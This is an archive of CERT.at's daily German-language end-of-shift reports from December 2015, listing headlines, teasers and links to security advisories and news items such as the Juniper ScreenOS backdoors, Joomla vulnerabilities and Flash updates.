The weird and wacky of 2015: strange security and privacy stories *** --------------------------------------------- These wacky stories remind us how important cybersecurity and online privacy have become in all areas of our lives. --------------------------------------------- https://nakedsecurity.sophos.com/2015/12/29/the-weird-and-wacky-of-2015-str… *** Steam blows as games websites security collapse *** --------------------------------------------- Christmas hiccup on gaming platform exposed user information to others --------------------------------------------- http://www.scmagazine.com/steam-blows-as-games-websites-security-collapse/a… *** 2755801 - Update for Vulnerabilities in Adobe Flash Player in Internet Explorer and Microsoft Edge - Version: 52.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/2755801 *** PHP Class Name Format String Flaw Lets Remote Users Execute Arbitrary C ode *** --------------------------------------------- http://www.securitytracker.com/id/1034543 *** Security Advisory: Apache HTTPD vulnerability CVE-2010-2791 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23332326.html?… *** Security Advisory: Apache vulnerability CVE-2011-3639 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/20/sol20979231.html?… *** AVG Anti-Virus Flaws in Web TuneUp Chrome Extension Lets Remote Users Obtain Potentially Sensitive Information on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1034547 Next End-of-Shift Report on 2016-01-04.

1 0

Tageszusammenfassung - Dienstag 29-12-2015
by Daily end-of-shift report 29 Dec '15

29 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Montag 28-12-2015 18:00 − Dienstag 29-12-2015 18:00 Handler: L. Aaron Kaplan Co-Handler: Stephan Richter *** Security Updates Available for Adobe Flash Player (APSB16-01) *** --------------------------------------------- A security bulletin (APSB16-01) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe is aware of a report that an... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1305 *** Quick Tips to Protect Your New (and old) Apple Devices *** --------------------------------------------- Apple has projected yet another record holiday for sales, but this should come as no surprise to fellow "Macheads". I myself, am a huge fan of Apple and have been for a quite...read moreThe post Quick Tips to Protect Your New (and old) Apple Devices appeared first on Webroot Threat Blog. --------------------------------------------- http://www.webroot.com/blog/2015/12/28/18251/ *** 2016 Reality: Lazy Authentication Still the Norm *** --------------------------------------------- My PayPal account was hacked on Christmas Eve. The perpetrator tried to further stir up trouble by sending my PayPal funds to a hacker gang that recruits for the terrorist group ISIS. Although the intruder failed to siphon any funds, the successful takeover of the account speaks volumes about why most organizations -- including many financial institutions -- remain woefully behind the times in authenticating their customers and staying ahead of identity thieves. --------------------------------------------- http://krebsonsecurity.com/2015/12/2016-reality-lazy-authentication-still-t… *** An Overview of the Upcoming libModSecurity *** --------------------------------------------- libModSecurity is a major rewrite of ModSecurity. It preserves the rich syntax and feature set of ModSecurity while delivering improved performance, stability, and a new experience in easy integration on different. libModSecurity - Motivations While ModSecurity version 2.9.0 is available... --------------------------------------------- http://trustwave.com/Resources/SpiderLabs-Blog/An-Overview-of-the-Upcoming-… *** Forscher: Herzschrittmacher für Hackerangriffe und Softwarefehler anfällig *** --------------------------------------------- Forscherin und Patientin Marie Moe sprach auf dem Hackerkongress 32C3 über das Thema --------------------------------------------- http://derstandard.at/2000028215506 *** Lets Encrypt: Ein kostenfreies Zertifikat, alle zwei Sekunden *** --------------------------------------------- Der Start der neuen Certificate Authority Lets Encrypt hat offenbar recht gut funktioniert. Nach nur rund einem Monat im Betabetrieb ist das Projekt schon die fünftgrößte CA der Welt. Doch es gibt noch einige Aufgaben zu bewältigen. --------------------------------------------- http://www.golem.de/news/let-s-encrypt-ein-kostenfreies-zertifikat-alle-zwe… *** 32C3: pushTAN-App der Sparkasse nach wie vor angreifbar *** --------------------------------------------- Zwischen Erlanger Sicherheitsforschern und dem Sparkassenverband hat sich ein Katz-und-Maus-Spiel um die Online-Banking-App "pushTAN" entwickelt. Die jüngste Version ließe sich weiter recht einfach angreifen, sagen Experten. --------------------------------------------- http://heise.de/-3056667 *** 32C3: Verschlüsselung gängiger RFID-Schließanlagen geknackt *** --------------------------------------------- RFID-Transponderkarten, die für die elektronische Zutrittskontrolle genutzt werden, lassen sich Sicherheitsexperten zufolge oft "trivial einfach" klonen. --------------------------------------------- http://heise.de/-3056646 *** Geldautomaten-Skimming auf dem Rückzug *** --------------------------------------------- Die Milliardeninvestitionen von Banken und Handel in mehr Sicherheit zeigen Wirkung: Datendiebe kommen am Geldautomat in Deutschland immer seltener zum Zug. Doch noch finden die Kriminellen Löcher im System. --------------------------------------------- http://heise.de/-3056638 *** Microsoft Has Your Encryption Key If You Use Windows 10 *** --------------------------------------------- An anonymous reader writes with this bit of news from the Intercept. If you login to Windows 10 using your Microsoft account, your computer automatically uploads a copy of your recovery key to a Microsoft servers. From the article: "The fact that new Windows devices require users to backup their recovery key on Microsofts servers is remarkably similar to a key escrow system, but with an important difference. Users can choose to delete recovery keys from their Microsoft accounts... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/YfNKeGMMq1o/microsoft-has-y… *** Voice over LTE: Angriffe auf mobile IP-Telefonie vorgestellt *** --------------------------------------------- Talks, die Albträume über mobile Kommunikation auslösen, haben beim CCC Tradition. Dieses Mal haben zwei koreanische Studenten Angriffe auf Voice over LTE vorgeführt. In Deutschland soll das angeblich nicht möglich sein. --------------------------------------------- http://www.golem.de/news/voice-over-lte-mobile-ip-telefonie-kann-abgehoert-… *** Fixing JavaScripts Broken Random Number Generator *** --------------------------------------------- szczys writes: It is surprising to learn how broken the JavaScript Random Number Generator has been for the past six years. The problem is compounded by the fact that Node.js uses the same broken Math.random() module. Learning about why this is broken is interesting, but perhaps even more interesting is how the bad code got there in the first place. It seems that a forum thread from way back in 1999 shared two versions of the code. If you read to the end of the thread you got the working --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/GG87DY0k6I4/fixing-javascri… *** DFN-CERT-2015-2002: Roundcubemail: Zwei Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2015-2002/ *** libtiff bmp file Heap Overflow *** --------------------------------------------- Topic: libtiff bmp file Heap Overflow Risk: High Text:Details = Product: libtiff Affected Versions: <= 4.0.6 Vulnerability Type: Heap Overflow Security Risk: High Vendor U... --------------------------------------------- https://cxsecurity.com/issue/WLB-2015120304

1 0

Tageszusammenfassung - Montag 28-12-2015
by Daily end-of-shift report 28 Dec '15

28 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 23-12-2015 18:00 − Montag 28-12-2015 18:00 Handler: L. Aaron Kaplan Co-Handler: Stephan Richter *** Malware-Driven Card Breach at Hyatt Hotels *** --------------------------------------------- Hyatt Hotels Corporation said today it recently discovered malicious software designed to steal credit card data on computers that operate the payment processing systems for Hyatt-managed locations. --------------------------------------------- http://krebsonsecurity.com/2015/12/malware-driven-card-breach-at-hyatt-hote… *** Using WPScan: Finding WordPress Vulnerabilities *** --------------------------------------------- When using WPScan you can scan your WordPress website for known vulnerabilities within the core version, plugins, and themes. You can also find out if any weak passwords, users, and security configuration issues are present. The database at wpvulndb.com is used to check for vulnerable software and the WPScan team maintains the ever-growing list ofRead More The post Using WPScan: Finding WordPress Vulnerabilities appeared first on Sucuri Blog. --------------------------------------------- https://blog.sucuri.net/2015/12/using-wpscan-finding-wordpress-vulnerabilit… *** NSA und GCHQ nutzen seit Jahren Hintertüren in Juniper-Firewalls *** --------------------------------------------- Geheimes Dokument aus 2011 zeigt Zusammenarbeit der zwei Geheimdienste --------------------------------------------- http://derstandard.at/2000028055853 *** Victims of the Gomasom Ransomware can now decrypt their files for free *** --------------------------------------------- Fabian Wosar, security researcher at Emsisoft, created a tool for decrypting files locked by the Gomasom Ransomware. Ransomware are the most threatening cyber threats for end-users, but today I have a good news for victims of the Gomasom ransomware, victims can rescue their locked files. The news was spread by the security researcher Fabian Wosar that developed a... --------------------------------------------- http://securityaffairs.co/wordpress/43074/malware/decrypt-gomasom-ransomwar… *** Hacker zeigen massive Lücken bei Bankomatkarten *** --------------------------------------------- Vor Publikum PIN ausgelesen, Prepaid-Karte aufgeladen und Zahlungen umgeleitet --------------------------------------------- http://derstandard.at/2000028162750 *** 32C3: Hardware-Trojaner als unterschätzte Gefahr *** --------------------------------------------- Fest in IT-Geräte und Chips eingebaute Hintertüren stellten eine "ernste Bedrohung" dar, warnten Sicherheitsexperten auf der Hackerkonferenz. Sie seien zwar nur mit großem Einwand einzubauen, aber auch schwer zu finden. --------------------------------------------- http://heise.de/-3056452 *** 32C3: Dieselgate und die omninöse Akustik-Funktion *** --------------------------------------------- Kann die Manipulation der Abgaswerte bei Volkswagen wirklich das Werk einzelner Ingenieure sein? Auf dem CCC-Congress erteilten ein Insider und ein Hacker dieser Legende eine Absage. --------------------------------------------- http://heise.de/-3056438 *** 32C3: Automatische Zugsicherung und vernetzte Bahntechnik im Hackervisier *** --------------------------------------------- Eine Hackergruppe, die sich auf Industrieanlagen konzentriert, hat diverse Angriffsflächen rund um vernetzte Systeme zur Zugkontrolle ausgemacht. Veraltete Software sowie unsichere Passwörter seien dort "überall" zu finden. --------------------------------------------- http://heise.de/-3056484 *** DSA-3430 libxml2 - security update *** --------------------------------------------- Several vulnerabilities were discovered in libxml2, a library providingsupport to read, modify and write XML and HTML files. A remote attackercould provide a specially crafted XML or HTML file that, when processedby an application using libxml2, would cause that application to use anexcessive amount of CPU, leak potentially sensitive information, orcrash the application. --------------------------------------------- https://www.debian.org/security/2015/dsa-3430 *** GIT git-remote-ext Helper URL Processing Lets Remote Users Execute Arbitrary Commands on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1034501 *** F5 Security Advisory: Apache vulnerability CVE-2010-0434 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/40/sol40284849.html?… *** EMC Secure Remote Services Virtual Edition Directory Traversal Flaw Lets Remote Authenticated Users View Files on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1034530 *** Cisco Jabber for Windows STARTTLS Downgrade Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Vuln: Dnsmasq CVE-2015-3294 Remote Denial of Service Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/74452 *** IDM 4.5 - 4.0.2 Midrange Driver Patch 4.0.2 *** --------------------------------------------- Abstract: Identity Manager Midrange: IBM i (i5/OS and OS/400) driver patch for the Identity Manager versions 4.0.2 or higher. Driver version will show i5os Driver Version 4.0.2 IDM 4.0.2 Build Date 20151207_1437IDM 4.5.x Build Date 201512071006 To see the version run I5OSDRV/I5OSDRV OPTION(*VERSION)Document ID: 5230811Security Alert: YesDistribution Type: Field Test FileEntitlement Required: NoFiles:idm45-402midrangepatch2.tar.gz (96.31 MB)Products:Identity Manager 4.0.2Identity Manager... --------------------------------------------- https://download.novell.com/Download?buildid=HsE3grsz-TU~ *** DFN-CERT-2015-1999: libvirt: Eine Schwachstelle ermöglicht die Manipulation von Dateien *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2015-1999/ *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in Websphere Liberty Profile (WLP) affect Power Management Console (CVE-2015-2017, CVE-2015-1927, CVE-2015-4938) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021040 --------------------------------------------- *** IBM Security Bulletin: Information disclosure vulnerability affects IBM Sterling B2B Integrator (CVE-2015-7410) *** http://www.ibm.com/support/docview.wss?uid=swg21972676 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Linux-PAM affects PowerKVM (CVE-2015-3238) *** http://www.ibm.com/support/docview.wss?uid=isg3T1022880 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in pam affect Power Management Console (CVE-2015-3238) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021041 --------------------------------------------- *** IBM Security Bulletin: A denial of service vulnerability affects IBM Sterling B2B Integrator (CVE-2014-0050) *** http://www.ibm.com/support/docview.wss?uid=swg21972944 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK including Logjam affect IBM PureApplication System. (CVE-2015-4000, CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, and CVE-2015-1931) *** http://www.ibm.com/support/docview.wss?uid=swg21973591 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational Synergy (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931 and CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21973439 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects IBM Integration Designer and WebSphere Integration Developer (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931, CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21972087 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities affects multiple IBM Rational products based on IBM Jazz technology (CVE-2015-4962, CVE-2015-4946) *** http://www.ibm.com/support/docview.wss?uid=swg21973404 --------------------------------------------- *** IBM Security Bulletin: Malformed ECParameters causes infinite loop (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023038 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities affect AppScan Enterprise *** http://www.ibm.com/support/docview.wss?uid=swg21972830 --------------------------------------------- *** IBM Security Bulletin: Clickjack vulnerability affects multiple IBM Rational products based on IBM Jazz technology (CVE-2015-1928) *** http://www.ibm.com/support/docview.wss?uid=swg21973200 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Content Manager Enterprise Edition (CVE-2015-1788) *** http://www.ibm.com/support/docview.wss?uid=swg21973416 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect the IBM Tivoli Storage Manager Client and IBM Tivoli Storage Manager for Virtual Environments: Data Protection for VMware (CVE-2014-3569, CVE-2014-3570, CVE-2014-3572, CVE-2014-8275, *** http://www.ibm.com/support/docview.wss?uid=swg21973383 --------------------------------------------- *** IBM Security Bulletin: Privilege escalation coverage gap in IBM SPSS Statistics (CVE-2015-7489) *** http://www.ibm.com/support/docview.wss?uid=swg21973502 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-4843, CVE-2015-4805, CVE-2015-4810, CVE-2015-4806, CVE-2015-4871, CVE-2015-4902) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023034 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Spectrum Scale RAID/IBM GPFS Native RAID (CVE-2015-4843, CVE-2015-4805, CVE-2015-4810, CVE-2015-4806, CVE-2015-4871, CVE-2015-4902) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005474 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM i. *** http://www.ibm.com/support/docview.wss?uid=nas8N1021047 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Monitoring clients (CVE-2015-2590 plus additional CVEs.) *** http://www.ibm.com/support/docview.wss?uid=swg21964027 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 23-12-2015
by Daily end-of-shift report 23 Dec '15

23 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 22-12-2015 18:00 − Mittwoch 23-12-2015 18:00 Handler: Alexander Riepl Co-Handler: n/a *** 2015 Ransomware Wrap-Up *** --------------------------------------------- Heres a rundown of the innovative ransomware that frightened users and earned attackers big bucks this year. --------------------------------------------- http://www.darkreading.com/endpoint/2015-ransomware-wrap-up/d/d-id/1323424 *** 3-in-1 Malware Infection through Spammed JavaScript Attachments *** --------------------------------------------- Recently weve observed a massive uptick of malicious spam with JavaScript attachments with an intention to spread and infect Windows systems with variety of malicious executables. The spam usually contains a ZIP file attachment containing only one JavaScript file. The .. --------------------------------------------- https://www.trustwave.com/Resources/SpiderLabs-Blog/3-in-1-Malware-Infectio… *** IT bloke: Crooks stole my bikes after cycling app blabbed my address *** --------------------------------------------- Brit suffers from GPS accuracy An IT manager in Manchester, England, says thieves stole his bikes after a smartphone cycling app pinpointed the location of his garage .. --------------------------------------------- www.theregister.co.uk/2015/12/22/it_manager_loses_bikes_after_cycling_app_p… *** Xen Project blunder blows own embargo with premature bug report *** --------------------------------------------- Malicious guest could eat your virtual rigs from the inside The Xen Project has reported a new bug, XSA-169, that means 'A malicious guest could cause repeated logging to the hypervisor console, leading to a Denial of Service attack.' .. --------------------------------------------- www.theregister.co.uk/2015/12/23/xen_blunder_blows_own_embargo_with_prematu… *** Expect Phishers to Up Their Game in 2016 *** --------------------------------------------- Expect phishers and other password thieves to up their game in 2016: Both Google and Yahoo! are taking steps to kill off the password as we know it.New authentication methods now offered by Yahoo! and to a beta group of Google users let customers log in just by supplying their email address, and then responding to a notification sent to their mobile device. --------------------------------------------- http://krebsonsecurity.com/2015/12/expect-phishers-to-up-their-game-in-2016 *** Why it's harder to forge a SHA-1 certificate than it is to find a SHA-1 collision *** --------------------------------------------- It's well known that SHA-1 is no longer considered a secure cryptographic hash function. Researchers now believe that finding a hash collision (two values that result in the same value when SHA-1 is applied) is inevitable and likely to happen in a matter of months. This poses a potential threat to trust on the web, as many websites use certificates that are digitally signed with algorithms that rely on SHA-1. Luckily for everyone, finding a hash collision is not enough to forge a digital --------------------------------------------- https://blog.cloudflare.com/why-its-harder-to-forge-a-sha-1-certificate-tha… *** Cyberangriffe auf türkische Internetserver *** --------------------------------------------- Unklare Hintergründe - Steckt Russland dahinter? Oder Anonymous? --------------------------------------------- http://derstandard.at/2000028013290 *** Hacker: Filmstars mit Problemen im Netz *** --------------------------------------------- Brandneue Spielfilme wie der jüngste Western von Quentin Tarantino sind im Internet aufgetaucht. Eine Reihe weiterer Stars hat ganz andere Probleme: Ein Hacker ist an Sexvideos und persönliche Daten von ihnen gelangt - er wurde allerdings nun verhaftet. --------------------------------------------- http://www.golem.de/news/hacker-filmstars-mit-problemen-im-netz-1512-118179… *** How a security director used a rootkit to rig the lottery and steal millions of dollars *** --------------------------------------------- Not too long ago, Eddie Tipton was convicted of hacking into the Multi-State Lottery Association's computer system in order to rig a nearly $17 million jackpot in Iowa. Now comes word that an investigation into Tipton's hacking activities is expanding to include a number of other states. Thus far, lottery officials from Colorado, Wisconsin and Oklahoma have indicated that Tipton may have also gamed lottery jackpots in their respective states. --------------------------------------------- https://bgr.com/2015/12/23/lottery-hacker-rootkit-stolen-numbers-investigat… *** Siemens RUGGEDCOM ROX-based Devices NTP Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for NTP daemon vulnerabilities in the Siemens RUGGEDCOM ROX-based devices. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-356-01 Aufgrund der Weihnachtsfeiertage erscheint der nächste End-of-Shift Report erst am 28.12.2015.

1 0

Tageszusammenfassung - Dienstag 22-12-2015
by Daily end-of-shift report 22 Dec '15

22 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Montag 21-12-2015 18:00 − Dienstag 22-12-2015 18:00 Handler: Alexander Riepl Co-Handler: n/a *** IBM Security Bulletin: Blind SQL injection vulnerability in IBM OpenPages GRC Platform API (CVE-2015-5049) *** --------------------------------------------- A blind SQL injection vulnerability has been found in the OpenPages GRC Platform API that could allow retrival or manipulation of information in the database. --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21970590 *** Cisco IOS XE Software Packet Processing Denial of Service Vulnerability *** --------------------------------------------- The vulnerability is due to incorrect processing of packets that have a source MAC address of 0000:0000:0000. An attacker could exploit this vulnerability by sending a frame that has a source MAC address of all zeros to an affected device. A successful exploit could allow the attacker to cause the device to reload. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** [20151207] - Core - SQL Injection *** --------------------------------------------- Inadequate filtering of request data leads to a SQL Injection vulnerability. --------------------------------------------- https://developer.joomla.org/security-centre/640-20151207-core-sql-injectio… *** [20151206] - Core - Session Hardening *** --------------------------------------------- The Joomla Security Strike team has been following up on the critical security vulnerability patched last week. Since the recent update it has become clear that the root cause is a bug in PHP itself. This was fixed by PHP in September of 2015 with the releases of PHP 5.4.45, 5.5.29, 5.6.13 (Note that this is fixed in all versions of PHP 7 and has been back-ported in some specific Linux LTS versions of PHP 5.3). This fixes the bug across all supported PHP versions. --------------------------------------------- https://developer.joomla.org/security-centre/639-20151206-core-session-hard… *** First Exploit Attempts For Juniper Backdoor Against Honeypot *** --------------------------------------------- We are detecting numerous login attempts against our ssh honeypots using the ScreenOSbackdoor password. Our honeypot doesnt emulate ScreenOS beyond the login banner, so we do not know what the attackers are up to, but some of the attacks appear to be manual in that we do see the attacker trying different .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20525 *** Protecting Your Sites from Apache.Commons Vulnerabilities *** --------------------------------------------- A few weeks ago, FoxGlove Security released this important blog post that includes several Proof-of-Concepts for exploiting Java unserialize vulnerabilities. A remote attacker can gain Remote Code Execution by sending specially crafted payload to any endpoint expecting a serialized .. --------------------------------------------- https://www.trustwave.com/Resources/SpiderLabs-Blog/Protecting-Your-Sites-f… *** Oracle muss Java-Updates nachbessern *** --------------------------------------------- Alte Java-Versionen müssen restlos von Computern verschwinden. Dafür muss Oracle sorgen. --------------------------------------------- http://heise.de/-3052761 *** Shopshifting: Sicherheitsforscher decken Lücken im elektronischen Zahlungsverkehr auf *** --------------------------------------------- Bezahl-Terminals sprechen übers Netz mit ihrer Kasse und dem Bezahldienstleister. Beide Kommunikationskanäle weisen Schwächen auf, die ein Angreifer nutzen kann, um Kunden oder Ladeninhaber auszuplündern. --------------------------------------------- http://heise.de/-3052165 *** rt-sa-2015-013 *** --------------------------------------------- https://www.redteam-pentesting.de/advisories/rt-sa-2015-013.txt *** Juniper backdoors *** --------------------------------------------- Juniper hat in einem Advisory (hier unsere unsere Warnung dazu) der Welt gesagt, dass sie bei einem Code-Audit zwei Hintertüren in ScreenOS gefunden haben.Die eine ist eine technisch ziemlich triviale Sache: ein konstantes Passwort erlaubt den Login per ssh oder telnet. Angeblich hat es nur 6 Stunden gebraucht, um dieses .. --------------------------------------------- http://www.cert.at/services/blog/20151222153859-1646.html *** IBM Security Bulletin: Multiple XSS Vulnerabilities in IBM UrbanCode Deploy (CVE-2015-7415) *** --------------------------------------------- IBM UrbanCode Deploy is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker .. --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21970811 *** Bericht: Hacker haben Teile des US-Stromnetzes infiltriert *** --------------------------------------------- In rund zwölf Fällen sollen Cyberangriffe auf Kontrollzentren von Energieversorgern in den USA während der vergangenen zehn Jahre erfolgreich gewesen sein. Der Hack des Anbieters Calpine ging wohl vom Iran aus. --------------------------------------------- http://heise.de/-3054887 *** Call for Papers: VB2016 Prague *** --------------------------------------------- VB seeks submissions for the 26th Virus Bulletin Conference.Virus Bulletin is seeking submissions from those wishing to present papers at VB2016, which will take place 5 to 7 October 2016 at the Hyatt Regency Denver Hotel in Denver, Colorado, USA.Originally started as an annual gathering of anti-virus experts, the .. --------------------------------------------- http://www.virusbtn.com/blog/2015/12_22.xml

1 0

Tageszusammenfassung - Montag 21-12-2015
by Daily end-of-shift report 21 Dec '15

21 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Freitag 18-12-2015 18:00 − Montag 21-12-2015 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Update für Crimeware Kit Microsoft Word Intruder *** --------------------------------------------- Über Sicherheitslücken in Microsoft Word kann ein Dateianhang schon beim Öffnen Windows-Systeme infizieren. Der Autor des im Untergrund beliebten Crimeware Kits MWI legt jetzt mit neuen Exploits nach. --------------------------------------------- http://heise.de/-3049547 *** VMSA-2015-0009 *** --------------------------------------------- VMware product updates address a critical deserialization vulnerability --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2015-0009.html *** VMSA-2015-0003.15 *** --------------------------------------------- VMware product updates address critical information disclosure issue in JRE --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2015-0003.html *** Avira Registry Cleaner DLL Hijacking *** --------------------------------------------- avira_registry_cleaner_en.exe, available from <https://www.avira.com/en/download/product/avira-registry-cleaner> to clean up remnants the uninstallers of their snakeoil products fail to remove, is vulnerable: it loads and executes WTSAPI32.dll, UXTheme.dll and RichEd20.dll from its application directory (tested and verified under Windows XP SP3 and Windows 7 SP1). --------------------------------------------- https://cxsecurity.com/issue/WLB-2015120223 *** PUPs Masquerade as Installer for Antivirus and Anti-Adware *** --------------------------------------------- If youre looking for download sites of programs you wish to install onto your machine or simply try out, you, dear Reader, would be better off dropping by their official websites. --------------------------------------------- https://blog.malwarebytes.org/online-security/2015/12/pups-masquerade-as-in… *** Joomla 0-Day Exploited In the Wild (CVE-2015-8562) *** --------------------------------------------- A recent new 0-day in Joomla discovered by Sucuri (Sucuri Blog) has drawn a lot of attention from the Joomla community, as well as attackers. Using knowledge gained from our recent research on Joomla (CVE-2015-7857, SpiderLabs Blog Post) and information .. --------------------------------------------- https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-0-Day-Exploited-… *** Google Chrome: Abschied von SHA-1-siginierten SSL-Zertifikaten *** --------------------------------------------- Ab Anfang nächsten Jahres wird Google Chrome keine neu ausgestellten SHA-1-signierten SSL-Zertifikate von öffentlichen CAs mehr akzeptieren. SHA-1 gilt seit zehn Jahren als unsicher, wird aber immer noch von HTTPS-Sites verwendet. --------------------------------------------- http://heise.de/-3049749 *** The EPS Awakens - Part 2 *** --------------------------------------------- https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-t… *** Facebook hammers another nail into Flashs coffin *** --------------------------------------------- The Social NetworkTM bins Adobes malware-magnet for video, adopts HTML5 Facebook has hammered puts another nail in to the coffin of Adobe Flash, by switching from the bug-ridden plug-in to HTML5 for all videos on the site. --------------------------------------------- www.theregister.co.uk/2015/12/21/facebook_dumps_flash_for_video/ *** Hello Kitty: Kinderdaten ungeschützt im Netz *** --------------------------------------------- Eine MongoDB-Datenbank mit den privaten Informationen zahlreicher Hello-Kitty-Fans wurde veröffentlicht. Vor allem Kinder dürften davon betroffen sein - und sollten ihre Passwörter bei anderen Diensten überprüfen. --------------------------------------------- http://www.golem.de/news/security-hello-kitty-gehackt-1512-118123.html *** XXX is Angler EK *** --------------------------------------------- http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html *** Schnüffelcode in Juniper-Netzgeräten: Weitere Erkenntnisse und Spekulationen *** --------------------------------------------- Die Analysen der ScreenOS-Updates fördern vogelwilde Dinge zu Tage. So gab es zwei unabhängige Hintertüren. Die SSH-Backdoor kann dank des veröffentlichten Passworts jeder ausnutzen; die komplexere VPN-Lücke beruht wohl auf einer bekannten NSA-Backdoor. --------------------------------------------- http://heise.de/-3051260 *** The many attacks on Zengge WiFi lightbulbs *** --------------------------------------------- In August I decided to check out the cool new Internet Of Things. I bought a WiFi-enabled colorful LED lightbulb. It was a cheap Chinese one that costs almost nothing on Alibaba, but I paid probably around $50 on Amazon. It's built by a company called Zengge. It turned out that my new lightbulb was a router, an HTTP server, an HTTP proxy, and a lot more. --------------------------------------------- http://blog.viktorstanchev.com/2015/12/20/the-many-attacks-on-zengge-wifi-l…

1 0

Tageszusammenfassung - Freitag 18-12-2015
by Daily end-of-shift report 18 Dec '15

18 Dec '15

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 17-12-2015 18:00 − Freitag 18-12-2015 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** JSA10713 - 2015-12 Out of Cycle Security Bulletin: ScreenOS: Multiple Security issues with ScreenOS (CVE-2015-7755) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10713 *** JSA10712 - 2015-12 Out of Cycle Security Bulletin: ScreenOS: Crafted SSH negotiation may trigger system crash (CVE-2015-7754) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10712 *** Cisco Model DPQ3925 Wireless Residential Gateway Information Disclosure Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Schneider Electric Modicon M340 Buffer Overflow Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a buffer overflow vulnerability in Schneider Electric's Modicon M340 PLC product line. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-351-01 *** Motorola MOSCAD SCADA IP Gateway Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for Remote File Inclusion and Cross-Site Request Forgery vulnerabilities in Motorola Solutions MOSCAD IP Gateway. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-351-02 *** eWON Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for several vulnerabilities in the eWON sa industrial router. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-15-351-03 *** Microsoft will stop trusting certificates from 20 Certificate Authorities *** --------------------------------------------- Starting on January 2016, Microsofts Trusted Root Certificate Program will no longer include twenty currently trusted CAs and will remove their root certificates removed from the Trusted .. --------------------------------------------- http://www.net-security.org/secworld.php?id=19252 *** Docker and Enterprise Security: Establishing Best Practices *** --------------------------------------------- Virtualization containers, with their extraordinarily efficient hardware utilization, can be like a dream come true for development teams. While containerization will probably .. --------------------------------------------- http://resources.infosecinstitute.com/docker-and-enterprise-security-establ… *** IBM Security Bulletins *** --------------------------------------------- *** Infosphere BigInsights is affected by a vulnerability in DB2 (CVE-2015-1947) *** 